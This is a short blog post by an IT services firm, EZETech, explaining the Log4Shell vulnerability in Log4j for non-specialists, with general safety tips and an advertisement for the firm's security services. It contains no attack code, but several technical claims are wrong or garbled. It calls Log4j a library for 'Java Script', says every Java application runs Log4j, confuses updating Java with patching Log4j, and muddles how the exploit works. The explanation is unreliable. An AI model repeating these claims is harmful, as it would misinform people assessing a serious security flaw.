The Log4j exploit, called Log4Shell or CVE-2021-44228, has been in the news in recent weeks. However, many are asking what it is and how is it bad. How has it made its way into millions of servers? How can you protect yourself?
The Confusion
The main confusion that come with the exploit is that it is not data but rather code. Log4j is not a malicious application or a virus. Log4j is simply a logging library for Java Script. An example of what it does is say you log into an account and with the wrong username or password, Log4j will keep track of that. However, it does log more than just usernames and passwords. It can also keep track and display error messages.
Where the Problem is and How it Works
The problem comes from that fact that every Java application is running Log4j to some extent. What that means that some apps use it directly while others use it indirectly. Approximately 60% of applications use Log4j indirectly and therefore it is so widespread.
How the exploit works is through JNDI (Java Naming and Directory Interface) lookups in log messages. Log4j allows the logging of expressions. Expressions perform the work of a Java program. Among other things, expressions are used to compute and assign values to variables and to help control the execution flow of a program. Like say displaying an error message when logging in with the wrong username or password.. JNDI store Java objects in remote locations and serialize them, like streaming them from a cloud server. When an object is searched or requested in an application, the JNDI will automatically go to look up the object from the remote server.
Why it works is because the link to the server could be to a malicious program. The malicious program could enable Remote Code Execution (RCE). RCE allows for any hack to run code on your machine by hacking the application that uses Log4j. So, say you are on a news app, and you search for a certain topic. The key words for the topic is the JNDI. The app will perform a JNDI lookup for articles that link to the key words. Then the app shows articles to download to read. The problem lies here. In the lookup process a cyber attacker just modifies the lookup code and redirect it to where they want it to go. After the hacker, when those key words are searched, the results are going to bring up code that allows for an RCE. This process is very easy to do since Java is open source. So, all the hacker has to know is how to code.
Am I Safe?
The version that was a problem has already been patched. However, just because Java has been updated doesn’t mean that you’re in the clear. We still need to wait for all applications using anything older than update 2.16 to be updated to the latest version. Here we are at the mercy of the companies and developers.
What Can I Do?
On the server side it is very simple. There are settings that control whether the logging system can interpret data as code. On the everyday side, there is not much you can do beside general cybersecurity safety. Be on the alert for phishing frauds, use a strong antivirus, and update your applications constantly. At EZETech, we make the process of keeping your data safe simple. With server monitoring and security control we can make sure that your server is protected. With risk management, passwords management, log and event management, backup and disaster recovery, our team of cybersecurity specialists strive to keep your data safe and secure.
Contact EZETech today for more information on our IT services.